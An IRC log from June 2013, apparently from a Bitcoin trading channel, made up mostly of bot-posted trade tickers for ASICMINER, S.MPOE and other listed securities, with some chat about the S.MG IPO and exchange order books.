BTC [-] Jun 09 20:36:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.0243 = 0.0729 BTC [-] **** BEGIN LOGGING AT Sun Jun 9 20:44:15 2013 Jun 09 20:44:32 [BTCTC] [BITVPS] 11 @ 0.000726 = 0.008 BTC [-] Jun 09 20:47:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.024397 BTC [+] Jun 09 20:48:12 [BTCTC] [TAT.ASICMINER] 24 @ 0.024398 = 0.5856 BTC [+] Jun 09 20:48:22 [BTCTC] [TAT.ASICMINER] 26 @ 0.024398 = 0.6343 BTC [+] Jun 09 20:51:03 [HAVELOCK] [ASICM] 6 @ 0.02465 = 0.1479 BTC [+] Jun 09 20:51:55 ;;bc,next Jun 09 20:51:55 Error: "bc,next" is not a valid command. Jun 09 20:52:54 ;;bc,stats Jun 09 20:52:57 Current Blocks: 240607 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 1312 blocks | Next Difficulty In About: 1 week, 0 days, 16 hours, 8 minutes, and 25 seconds | Next Difficulty Estimate: 18436145.5877 | Estimated Percent Change: 18.13776 Jun 09 20:54:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.02447 = 0.0979 BTC [+] Jun 09 20:54:56 [BTCTC] [TAT.ASICMINER] 24 @ 0.024398 = 0.5856 BTC [-] Jun 09 20:57:04 [BTCTC] [TAT.ASICMINER] 20 @ 0.024398 = 0.488 BTC [-] Jun 09 20:57:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.0243 = 0.0729 BTC [-] Jun 09 20:58:32 [BTCTC] [TAT.ASICMINER] 7 @ 0.024 = 0.168 BTC [-] Jun 09 20:59:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.024 = 0.096 BTC [-] Jun 09 21:00:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.02361 = 0.0708 BTC [-] Jun 09 21:00:30 [BTCTC] [TAT.ASICMINER] 17 @ 0.02361 = 0.4014 BTC [-] Jun 09 21:03:25 [HAVELOCK] [ASICM] 1 @ 0.02465 BTC [+] Jun 09 21:04:23 kakobrekla check this out : Jun 09 21:04:44 http://bitbet.us/bet/463/block-241921-difficulty-will-be-an-even-number/ vs http://betsofbitco.in/item?id=1645 Jun 09 21:06:59 [BTCTC] [ASICMINER-PT] 1 @ 2.4739 BTC [+] Jun 09 21:07:00 [BTCTC] [ASICMINER-PT] 8 @ 2.474 = 19.792 BTC [+] Jun 09 21:08:40 [BTCTC] [ASICMINER-PT] 3 @ 2.474999 = 7.425 BTC [+] Jun 09 21:09:39 [BTCTC] [PAJKA.BOND] 1 @ 0.084 BTC [+] Jun 09 21:09:59 [BTCTC] [TAT.ASICMINER] 16 @ 0.024397 = 0.3904 BTC [+] Jun 09 21:10:42 [BTCTC] [ASICMINER-PT] 12 @ 2.474999 = 29.7 BTC [+] Jun 09 21:10:46 [BTCTC] [ASICMINER-PT] 4 @ 2.475 = 9.9 BTC [+] Jun 09 21:11:03 [BTCTC] [ASICMINER-PT] 1 @ 2.435001 BTC [-] Jun 09 21:11:51 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [+] Jun 09 21:12:55 ;;aks 11111111111111111 Jun 09 21:12:55 Error: "aks" is not a valid command. Jun 09 21:13:02 ;;asks 1111111111111111111111 Jun 09 21:13:08 There are currently 132803.17 bitcoins offered at or under 1.11111111111e+21 USD, worth 3.19950778986e+12 USD in total. | Data vintage: 0.0686 seconds Jun 09 21:13:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.024397 BTC [+] Jun 09 21:13:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.024398 = 0.1464 BTC [+] Jun 09 21:14:10 [BTCTC] [S.MPOE-PT] 8 @ 0.000723 = 0.0058 BTC [-] Jun 09 21:14:54 [BTCTC] [TAT.ASICMINER] 23 @ 0.024489 = 0.5632 BTC [+] Jun 09 21:15:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [+] Jun 09 21:16:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [+] Jun 09 21:17:14 [BTCTC] [TAT.ASICMINER] 27 @ 0.024685 = 0.6665 BTC [+] Jun 09 21:22:42 [BTCTC] [ASICMINER-PT] 1 @ 2.4749 BTC [+] Jun 09 21:22:44 [BTCTC] [ASICMINER-PT] 10 @ 2.475 = 24.75 BTC [+] Jun 09 21:24:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.024685 = 0.1481 BTC [+] Jun 09 21:25:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.024685 = 0.0987 BTC [+] Jun 09 21:25:16 [BTCTC] [TAT.ASICMINER] 9 @ 0.024685 = 0.2222 BTC [+] Jun 09 21:26:31 [MPEX] [S.MPOE] 4321 @ 0.00072268 = 3.1227 BTC [-] Jun 09 21:26:33 [MPEX] [S.MPOE] 5000 @ 0.00072261 = 3.6131 BTC [-] Jun 09 21:26:43 [MPEX] [S.MPOE] 1029 @ 0.00072258 = 0.7435 BTC [-] Jun 09 21:26:55 [BTCTC] [TAT.ASICMINER] 15 @ 0.024698 = 0.3705 BTC [+] Jun 09 21:28:21 [HAVELOCK] [ASICM] 3 @ 0.02465 = 0.074 BTC [+] Jun 09 21:31:30 [BTCTC] [ASICMINER-PT] 14 @ 2.475 = 34.65 BTC [+] Jun 09 21:37:23 [BTCTC] [ASICMINER-PT] 1 @ 2.43551 BTC [-] Jun 09 21:37:25 [BTCTC] [ASICMINER-PT] 1 @ 2.4355 BTC [-] Jun 09 21:37:27 [BTCTC] [ASICMINER-PT] 1 @ 2.435001 BTC [-] Jun 09 21:37:29 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [-] Jun 09 21:37:29 [BTCTC] [ASICMINER-PT] 1 @ 2.420001 BTC [-] Jun 09 21:45:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.024698 BTC [+] Jun 09 21:47:36 [HAVELOCK] [ASICM] 46 @ 0.0242 = 1.1132 BTC [-] Jun 09 21:49:02 [BTCTC] [BITVPS] 6 @ 0.000726 = 0.0044 BTC [-] Jun 09 21:49:31 [HAVELOCK] [ASICM] 37 @ 0.02410102 = 0.8917 BTC [-] Jun 09 22:01:18 [HAVELOCK] [ASICM] 1 @ 0.0241347 BTC [+] Jun 09 22:04:48 [BTCTC] [BASIC-MINING] 1 @ 0.650101 BTC [-] Jun 09 22:05:10 [BTCTC] [BASIC-MINING] 1 @ 0.6501 BTC [-] Jun 09 22:05:12 [BTCTC] [BASIC-MINING] 1 @ 0.65 BTC [-] Jun 09 22:05:15 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [-] Jun 09 22:05:17 [BTCTC] [BASIC-MINING] 1 @ 0.61 BTC [-] Jun 09 22:05:44 [BTCTC] [ASICMINER-PT] 1 @ 2.4301 BTC [+] Jun 09 22:08:55 [BTCTC] [ASICMINER-PT] 1 @ 2.468999 BTC [+] Jun 09 22:09:00 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [+] Jun 09 22:12:07 [BTCTC] [TAT.ASICMINER] 47 @ 0.0246 = 1.1562 BTC [-] Jun 09 22:12:42 [HAVELOCK] [ASICM] 40 @ 0.02410103 = 0.964 BTC [-] Jun 09 22:12:58 [HAVELOCK] [ASICM] 10 @ 0.02410102 = 0.241 BTC [-] Jun 09 22:13:53 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] Jun 09 22:15:19 [BTCTC] [ASICMINER-PT] 5 @ 2.475 = 12.375 BTC [+] Jun 09 22:16:22 [BTCTC] [PAJKA.BOND] 1 @ 0.084 BTC [+] Jun 09 22:16:51 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Jun 09 22:18:07 [HAVELOCK] [ASICM] 1 @ 0.02463 BTC [+] Jun 09 22:18:18 [BTCTC] [COGNITIVE] 1 @ 0.2751 BTC [-] Jun 09 22:20:58 [BTCTC] [B.YABMC] 5 @ 0.0135 = 0.0675 BTC [+] Jun 09 22:21:40 [HAVELOCK] [ASICM] 46 @ 0.024644 = 1.1336 BTC [+] Jun 09 22:23:13 [HAVELOCK] [ASICM] 1 @ 0.02465 BTC [+] Jun 09 22:25:03 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [-] Jun 09 22:25:46 [HAVELOCK] [ASICM] 29 @ 0.02465 = 0.7149 BTC [+] Jun 09 22:31:11 [HAVELOCK] [ASICM] 10 @ 0.02465 = 0.2465 BTC [+] Jun 09 22:33:58 [HAVELOCK] [ASICM] 30 @ 0.02465 = 0.7395 BTC [+] Jun 09 22:34:24 [HAVELOCK] [ASICM] 4 @ 0.02465 = 0.0986 BTC [+] Jun 09 22:36:06 [BTCTC] [B.YABMC] 5 @ 0.0136 = 0.068 BTC [+] Jun 09 22:37:15 [BTCTC] [COGNITIVE] 1 @ 0.275 BTC [-] Jun 09 22:37:58 [BTCTC] [ASICMINER-PT] 1 @ 2.4501 BTC [-] Jun 09 22:37:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.024698 BTC [+] Jun 09 22:40:11 [BTCTC] [TAT.ASICMINER] 49 @ 0.024698 = 1.2102 BTC [+] Jun 09 22:41:33 [BTCTC] [B.YABMC] 7 @ 0.014339 = 0.1004 BTC [+] Jun 09 22:44:12 [BTCTC] [ASICMINER-PT] 1 @ 2.4501 BTC [-] Jun 09 22:45:19 [MPEX] [S.MPOE] 4321 @ 0.00072646 = 3.139 BTC [+] Jun 09 22:45:20 [MPEX] [S.MPOE] 1029 @ 0.00072726 = 0.7484 BTC [+] Jun 09 22:45:21 [MPEX] [S.MPOE] 2850 @ 0.00072727 = 2.0727 BTC [+] Jun 09 22:45:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.024698 = 0.1235 BTC [+] Jun 09 22:50:53 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [+] Jun 09 22:51:00 [HAVELOCK] [ASICM] 26 @ 0.02465 = 0.6409 BTC [+] Jun 09 22:51:33 [BTCTC] [ASICMINER-PT] 3 @ 2.475 = 7.425 BTC [+] Jun 09 22:55:40 [HAVELOCK] [ASICM] 120 @ 0.02465 = 2.958 BTC [+] Jun 09 23:00:39 [MPEX] [S.MPOE] 4321 @ 0.00072599 = 3.137 BTC [-] Jun 09 23:00:41 [MPEX] [S.MPOE] 27000 @ 0.00072585 = 19.598 BTC [-] Jun 09 23:05:42 [HAVELOCK] [ASICM] 37 @ 0.02465 = 0.9121 BTC [+] Jun 09 23:09:17 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [+] Jun 09 23:09:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.024982 = 0.05 BTC [+] Jun 09 23:11:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.024982 BTC [+] Jun 09 23:15:14 [BTCTC] [ASICMINER-PT] 1 @ 2.4501 BTC [-] Jun 09 23:15:58 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] Jun 09 23:16:40 [BTCTC] [ASICMINER-PT] 1 @ 2.4302 BTC [-] Jun 09 23:18:00 [BTCTC] [ASICMINER-PT] 2 @ 2.43 = 4.86 BTC [-] Jun 09 23:18:53 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] Jun 09 23:38:35 [HAVELOCK] [ASICM] 571 @ 0.02465 = 14.0752 BTC [+] Jun 10 00:00:06 [MPEX] [S.MPOE] 4321 @ 0.00072403 = 3.1285 BTC [-] Jun 10 00:00:32 [MPEX] [S.MPOE] 10779 @ 0.00072409 = 7.805 BTC [+] Jun 10 00:00:33 [HAVELOCK] [ASICM] 4 @ 0.02495 = 0.0998 BTC [+] Jun 10 00:04:11 [BTCTC] [TAT.ASICMINER] 8 @ 0.024982 = 0.1999 BTC [+] Jun 10 00:09:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.024551 = 0.491 BTC [-] Jun 10 00:10:25 [BTCTC] [TAT.ASICMINER] 15 @ 0.02455 = 0.3683 BTC [-] Jun 10 00:11:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.0245 = 0.1225 BTC [-] Jun 10 00:11:48 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [+] Jun 10 00:15:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.024981 BTC [+] Jun 10 00:16:17 [BTCTC] [B.YABMC] 8 @ 0.014339 = 0.1147 BTC [+] Jun 10 00:29:52 [BTCTC] [ASICMINER-PT] 20 @ 2.46 = 49.2 BTC [-] Jun 10 00:31:23 [BTCTC] [ASICMINER-PT] 2 @ 2.456002 = 4.912 BTC [-] Jun 10 00:31:26 [BTCTC] [ASICMINER-PT] 2 @ 2.455002 = 4.91 BTC [-] Jun 10 00:31:30 [BTCTC] [ASICMINER-PT] 5 @ 2.455 = 12.275 BTC [-] Jun 10 00:32:23 [HAVELOCK] [ASICM] 46 @ 0.024301 = 1.1178 BTC [-] Jun 10 00:32:25 [HAVELOCK] [ASICM] 575 @ 0.02421 = 13.9208 BTC [-] Jun 10 00:32:26 [HAVELOCK] [ASICM] 4 @ 0.0242 = 0.0968 BTC [-] Jun 10 00:33:35 [HAVELOCK] [ASICM] 5 @ 0.0242 = 0.121 BTC [-] Jun 10 00:33:36 [HAVELOCK] [ASICM] 118 @ 0.0242 = 2.8556 BTC [-] Jun 10 00:33:38 [HAVELOCK] [ASICM] 29 @ 0.02412 = 0.6995 BTC [-] Jun 10 00:33:39 [HAVELOCK] [ASICM] 53 @ 0.02410102 = 1.2774 BTC [-] Jun 10 00:33:39 [HAVELOCK] [ASICM] 50 @ 0.02410101 = 1.2051 BTC [-] Jun 10 00:33:40 [HAVELOCK] [ASICM] 2 @ 0.0241 = 0.0482 BTC [-] Jun 10 00:33:41 [HAVELOCK] [ASICM] 27 @ 0.024 = 0.648 BTC [-] Jun 10 00:33:42 [HAVELOCK] [ASICM] 10 @ 0.024 = 0.24 BTC [-] Jun 10 00:34:35 [BTCTC] [TAT.ASICMINER] 46 @ 0.0245 = 1.127 BTC [-] Jun 10 00:34:40 [BTCTC] [TAT.ASICMINER] 11 @ 0.0245 = 0.2695 BTC [-] Jun 10 00:34:42 [BTCTC] [TAT.ASICMINER] 83 @ 0.024104 = 2.0006 BTC [-] Jun 10 00:34:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.024103 BTC [-] Jun 10 00:34:46 [BTCTC] [TAT.ASICMINER] 19 @ 0.024102 = 0.4579 BTC [-] Jun 10 00:34:48 [BTCTC] [TAT.ASICMINER] 40 @ 0.0241 = 0.964 BTC [-] Jun 10 00:34:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.02401 BTC [-] Jun 10 00:34:50 [BTCTC] [TAT.ASICMINER] 52 @ 0.024001 = 1.2481 BTC [-] Jun 10 00:37:44 [BTCTC] [ASICMINER-PT] 1 @ 2.435032 BTC [-] Jun 10 00:37:49 [BTCTC] [ASICMINER-PT] 1 @ 2.435031 BTC [-] Jun 10 00:37:51 [BTCTC] [ASICMINER-PT] 2 @ 2.432102 = 4.8642 BTC [-] Jun 10 00:37:56 [BTCTC] [ASICMINER-PT] 4 @ 2.4321 = 9.7284 BTC [-] Jun 10 00:38:00 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] Jun 10 00:38:02 [BTCTC] [ASICMINER-PT] 1 @ 2.422 BTC [-] Jun 10 00:38:05 [BTCTC] [ASICMINER-PT] 4 @ 2.4 = 9.6 BTC [-] Jun 10 00:46:38 [HAVELOCK] [ASICM] 6 @ 0.024 = 0.144 BTC [-] Jun 10 00:51:41 [MPEX] [S.MPOE] 6600 @ 0.00072409 = 4.779 BTC [+] Jun 10 00:54:02 [HAVELOCK] [ASICM] 50 @ 0.0244 = 1.22 BTC [+] Jun 10 00:56:42 [HAVELOCK] [ASICM] 9 @ 0.0244 = 0.2196 BTC [+] Jun 10 01:01:17 [HAVELOCK] [ASICM] 25 @ 0.0244 = 0.61 BTC [+] Jun 10 01:02:09 [HAVELOCK] [ASICM] 30 @ 0.0244 = 0.732 BTC [+] Jun 10 01:10:49 [MPEX] [S.MPOE] 15500 @ 0.00072392 = 11.2208 BTC [-] Jun 10 01:10:51 [MPEX] [S.MPOE] 100 @ 0.0007235 = 0.0724 BTC [-] Jun 10 01:19:07 [HAVELOCK] [ASICM] 4 @ 0.0242 = 0.0968 BTC [-] Jun 10 01:19:32 [BTCTC] [ASICMINER-PT] 1 @ 2.469998 BTC [+] Jun 10 01:21:50 [HAVELOCK] [ASICM] 200 @ 0.0239 = 4.78 BTC [-] Jun 10 01:21:52 [HAVELOCK] [ASICM] 1 @ 0.0239 BTC [-] Jun 10 01:21:53 [HAVELOCK] [ASICM] 30 @ 0.0239 = 0.717 BTC [-] Jun 10 01:22:35 [HAVELOCK] [ASICM] 169 @ 0.0239 = 4.0391 BTC [-] Jun 10 01:23:34 [HAVELOCK] [ASICM] 79 @ 0.02425 = 1.9158 BTC [+] Jun 10 01:25:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.024011 = 0.4802 BTC [+] Jun 10 01:25:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.02401 = 0.2401 BTC [-] Jun 10 01:25:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.024002 BTC [-] Jun 10 01:25:44 [BTCTC] [TAT.ASICMINER] 11 @ 0.024 = 0.264 BTC [-] Jun 10 01:25:46 [BTCTC] [TAT.ASICMINER] 23 @ 0.023605 = 0.5429 BTC [-] Jun 10 01:25:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.023605 BTC [-] Jun 10 01:25:53 [BTCTC] [TAT.ASICMINER] 22 @ 0.023604 = 0.5193 BTC [-] Jun 10 01:25:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.023603 BTC [-] Jun 10 01:25:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.023603 BTC [-] Jun 10 01:25:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.0236 = 0.118 BTC [-] Jun 10 01:26:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.023502 BTC [-] Jun 10 01:26:07 [MPEX] [S.MPOE] 4221 @ 0.0007235 = 3.0539 BTC [-] Jun 10 01:26:37 [MPEX] [S.MPOE] 17179 @ 0.00072332 = 12.4259 BTC [-] Jun 10 01:28:32 [HAVELOCK] [HIM] 5 @ 0.2820001 = 1.41 BTC [+] Jun 10 01:28:33 [HAVELOCK] [HIM] 15 @ 0.282 = 4.23 BTC [-] Jun 10 01:43:05 [MPEX] [S.MPOE] 4321 @ 0.00072385 = 3.1278 BTC [+] Jun 10 01:43:07 [MPEX] [S.MPOE] 16400 @ 0.00072409 = 11.8751 BTC [+] Jun 10 02:02:26 [HAVELOCK] [ASICM] 10 @ 0.024 = 0.24 BTC [-] Jun 10 02:03:38 ThickAsThieves: hey TAT when does VM go live on BTCT? Jun 10 02:05:30 [BTCTC] [BTC-BOND] 1 @ 0.00992 BTC [-] Jun 10 02:11:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.024394 BTC [+] Jun 10 02:11:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.024394 = 0.0488 BTC [+] Jun 10 02:14:07 [MPEX] [S.MPOE] 2650 @ 0.00072711 = 1.9268 BTC [+] Jun 10 02:16:12 [HAVELOCK] [ASICM] 17 @ 0.024 = 0.408 BTC [-] Jun 10 02:18:37 [HAVELOCK] [ASICM] 22 @ 0.024 = 0.528 BTC [-] Jun 10 02:20:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.024391 = 0.0976 BTC [-] Jun 10 02:21:52 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] Jun 10 02:23:02 [BTCTC] [ASICMINER-PT] 3 @ 2.45 = 7.35 BTC [+] Jun 10 02:27:40 [BTCTC] [ASICMINER-PT] 1 @ 2.459999 BTC [+] Jun 10 02:32:25 [BTCTC] [ASICMINER-PT] 1 @ 2.459999 BTC [+] Jun 10 02:34:30 [BTCTC] [BITVPS] 1 @ 0.000644 BTC [-] Jun 10 02:35:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.024389 BTC [-] Jun 10 02:35:29 [BTCTC] [ASICMINER-PT] 1 @ 2.421 BTC [-] Jun 10 02:40:14 !ticker s.mg Jun 10 02:40:14 Yeah. No damn tobacco, that's for sure. Jun 10 02:40:18 !ticker m s.mg Jun 10 02:40:19 [MPEX:S.MG] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC), 30D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC) Jun 10 02:45:40 [MPEX] [S.MPOE] 5400 @ 0.00072711 = 3.9264 BTC [+] Jun 10 02:48:38 MG? Jun 10 02:48:53 mircea_popescu: mg linky? Jun 10 02:49:13 [BTCTC] [BITVPS] 20 @ 0.000714 = 0.0143 BTC [+] Jun 10 02:51:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.024387 = 0.0488 BTC [-] Jun 10 02:55:56 [BTCTC] [ASICMINER-PT] 1 @ 2.4599 BTC [+] Jun 10 03:04:17 dub http://trilema.com/2013/introducing-smg-the-ministry-of-games/ Jun 10 03:04:27 also http://mpex.co/?mpsic=S.MG Jun 10 03:10:36 [BTCTC] [TAT.ASICMINER] 15 @ 0.024384 = 0.3658 BTC [-] Jun 10 03:11:59 [BTCTC] [PAJKA.BOND] 2 @ 0.084 = 0.168 BTC [+] Jun 10 03:14:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.023811 BTC [-] Jun 10 03:14:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.02381 = 0.0714 BTC [-] Jun 10 03:14:50 [BTCTC] [ASICMINER-PT] 1 @ 2.4599 BTC [+] Jun 10 03:15:01 [BTCTC] [RSM] 10 @ 0.0073 = 0.073 BTC [-] Jun 10 03:15:29 [BTCTC] [RSM] 10 @ 0.0071 = 0.071 BTC [-] Jun 10 03:15:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.023801 = 0.1428 BTC [-] Jun 10 03:16:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.024384 = 0.0975 BTC [+] Jun 10 03:16:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.024384 = 0.0488 BTC [+] Jun 10 03:23:14 [HAVELOCK] [ASICM] 21 @ 0.024 = 0.504 BTC [-] Jun 10 03:35:39 [MPEX] [S.MPOE] 2150 @ 0.00072727 = 1.5636 BTC [+] Jun 10 03:35:43 [MPEX] [S.MPOE] 8458 @ 0.00072728 = 6.1513 BTC [+] Jun 10 03:35:50 [BTCTC] [TAT.ASICMINER] 23 @ 0.024382 = 0.5608 BTC [-] Jun 10 03:36:13 [BTCTC] [TAT.ASICMINER] 20 @ 0.024382 = 0.4876 BTC [-] Jun 10 03:44:28 [HAVELOCK] [SDICE] 1 @ 0.2104 BTC [-] Jun 10 03:45:38 [HAVELOCK] [ASICM] 11 @ 0.0239 = 0.2629 BTC [-] Jun 10 03:53:44 [BTCTC] [S.MPOE-PT] 1 @ 0.000723 BTC [-] Jun 10 03:57:09 mp, how did the IPO go? Did you sell out all your 100m shares? Jun 10 04:01:42 [HAVELOCK] [ASICM] 4 @ 0.0239 = 0.0956 BTC [-] Jun 10 04:04:04 furuknap about 80mn or so sold sofar. Jun 10 04:04:12 going to have a final sale today and that's that. Jun 10 04:04:17 Impressive, congratulations :-) Jun 10 04:06:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.02439 BTC [+] Jun 10 04:07:21 [BTCTC] [GSDPT] 13 @ 0.003184 = 0.0414 BTC [-] Jun 10 04:09:34 [BTCTC] [PAJKA.BOND] 10 @ 0.0761 = 0.761 BTC [-] Jun 10 04:10:45 mircea_popescu: how long till you're closing it? Jun 10 04:18:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.02439 = 0.0976 BTC [+] Jun 10 04:22:24 [MPEX] [S.MPOE] 1629 @ 0.00072711 = 1.1845 BTC [-] Jun 10 04:22:57 today. Jun 10 04:23:39 furuknap i guess so, 8k btc on a blog post. Jun 10 04:24:05 Indeed :-) Jun 10 04:24:07 [MPEX] [S.MPOE] 7909 @ 0.00072563 = 5.739 BTC [-] Jun 10 04:24:26 hm Jun 10 04:24:32 the orders here : http://mpex.co/?mpsic=S.MG Jun 10 04:24:35 are newest first Jun 10 04:24:42 at same price Jun 10 04:24:43 mircea_popescu: today in an hour or today in 23 hours 59 min? Jun 10 04:24:49 which is kinda silly Jun 10 04:25:44 i think it would make more sense the other way around, for bids part of the table Jun 10 04:26:20 i noticed that before in the books. Jun 10 04:28:02 [BTCTC] [ASICMINER-PT] 1 @ 2.458 BTC [-] Jun 10 04:36:37 kakobrekla same price orders are listed kinda randomly. Jun 10 04:36:42 (not executed randomly tho) Jun 10 04:36:48 dub something like that. Jun 10 04:37:46 [BTCTC] [TAT.ASICMINER] 97 @ 0.024382 = 2.3651 BTC [-] Jun 10 04:39:45 [BTCTC] [ASICMINER-PT] 2 @ 2.457999 = 4.916 BTC [-] Jun 10 04:39:46 [BTCTC] [ASICMINER-PT] 4 @ 2.458 = 9.832 BTC [+] Jun 10 04:40:06 [HAVELOCK] [ASICM] 15 @ 0.0239 = 0.3585 BTC [-] Jun 10 04:40:57 [HAVELOCK] [ASICM] 200 @ 0.02399 = 4.798 BTC [+] Jun 10 04:42:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.02439 = 0.0976 BTC [+] Jun 10 04:42:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0244 BTC [+] Jun 10 04:42:58 [HAVELOCK] [ASICM] 151 @ 0.02399 = 3.6225 BTC [+] Jun 10 04:45:48 [HAVELOCK] [HIM] 1 @ 0.2801 BTC [-] Jun 10 04:45:49 [HAVELOCK] [HIM] 2 @ 0.28000049 = 0.56 BTC [-] Jun 10 04:45:51 [HAVELOCK] [HIM] 10 @ 0.28 = 2.8 BTC [-] Jun 10 04:45:53 lol Jun 10 04:45:55 fuck you Jun 10 04:46:39 [HAVELOCK] [ASICM] 174 @ 0.02399 = 4.1743 BTC [+] Jun 10 04:48:47 [HAVELOCK] [HIM] 2 @ 0.28 = 0.56 BTC [-] Jun 10 04:49:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.0244 = 0.244 BTC [+] Jun 10 04:51:12 mircea_popescu: I've been playing a bit of PoE again, much more fun as a witch Jun 10 04:51:43 [BTCTC] [ASICMINER-PT] 1 @ 2.457 BTC [-] Jun 10 04:53:22 [HAVELOCK] [ASICM] 23 @ 0.02399 = 0.5518 BTC [+] Jun 10 04:53:56 she's ak iller. Jun 10 04:56:26 hit me up if you need play testers, a bit of an rpg noob but im fps jesus Jun 10 04:59:31 [BTCTC] [TAT.ASICMINER] 17 @ 0.0244 = 0.4148 BTC [+] Jun 10 05:03:40 dub yeh, i kinda plan to be very open with development afap Jun 10 05:04:31 [HAVELOCK] [ASICM] 138 @ 0.02399 = 3.3106 BTC [+] Jun 10 05:08:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.024399 = 0.488 BTC [-] Jun 10 05:10:11 fap fap fap Jun 10 05:11:16 [HAVELOCK] [ASICM] 193 @ 0.024 = 4.632 BTC [+] Jun 10 05:13:10 [BTCTC] [TAT.ASICMINER] 143 @ 0.024399 = 3.4891 BTC [-] Jun 10 05:14:45 [HAVELOCK] [ASICM] 1 @ 0.024 BTC [+] Jun 10 05:14:50 [HAVELOCK] [ASICM] 1 @ 0.024 BTC [+] Jun 10 05:22:31 [HAVELOCK] [ASICM] 15 @ 0.024 = 0.36 BTC [+] Jun 10 05:25:40 [HAVELOCK] [ASICM] 1 @ 0.0239 BTC [-] Jun 10 05:25:41 [HAVELOCK] [ASICM] 611 @ 0.023651 = 14.4508 BTC [-] Jun 10 05:26:28 [MPEX] [S.MPOE] 2700 @ 0.0007264 = 1.9613 BTC [+] Jun 10 05:28:08 [BTCTC] [TAT.ASICMINER] 72 @ 0.0244 = 1.7568 BTC [+] Jun 10 05:31:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.0245 = 0.098 BTC [+] Jun 10 05:31:28 [BTCTC] [TAT.ASICMINER] 58 @ 0.0245 = 1.421 BTC [+] Jun 10 05:31:56 [BTCTC] [TAT.ASICMINER] 31 @ 0.0245 = 0.7595 BTC [+] Jun 10 05:35:58 [BTCTC] [TAT.ASICMINER] 284 @ 0.0245 = 6.958 BTC [+] Jun 10 05:45:46 [BTCTC] [TAT.ASICMINER] 50 @ 0.0245 = 1.225 BTC [+] Jun 10 05:49:42 [BTCTC] [TAT.ASICMINER] 8 @ 0.0245 = 0.196 BTC [+] Jun 10 05:53:25 [BTCTC] [S.DICE-PT] 1 @ 0.002844 BTC [+] Jun 10 06:01:18 [HAVELOCK] [ASICM] 20 @ 0.024 = 0.48 BTC [+] Jun 10 06:01:23 [BTCTC] [TAT.ASICMINER] 40 @ 0.0245 = 0.98 BTC [+] Jun 10 06:04:20 https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-ash3/6501_10200726113288502_1657556126_n.jpg Jun 10 06:14:01 mircea_popescu: wait what? Jun 10 06:14:22 Lol Jun 10 06:17:26 [BTCTC] [TAT.ASICMINER] 25 @ 0.0245 = 0.6125 BTC [+] Jun 10 06:25:28 totally. Jun 10 06:28:46 [BTCTC] [ASICMINER-PT] 1 @ 2.425001 BTC [-] Jun 10 06:28:48 [BTCTC] [ASICMINER-PT] 1 @ 2.425 BTC [-] Jun 10 06:28:51 [BTCTC] [ASICMINER-PT] 2 @ 2.42116 = 4.8423 BTC [-] Jun 10 06:28:55 [BTCTC] [ASICMINER-PT] 2 @ 2.421007 = 4.842 BTC [-] Jun 10 06:30:41 [BTCTC] [BASIC-MINING] 1 @ 0.650001 BTC [+] Jun 10 06:30:44 [BTCTC] 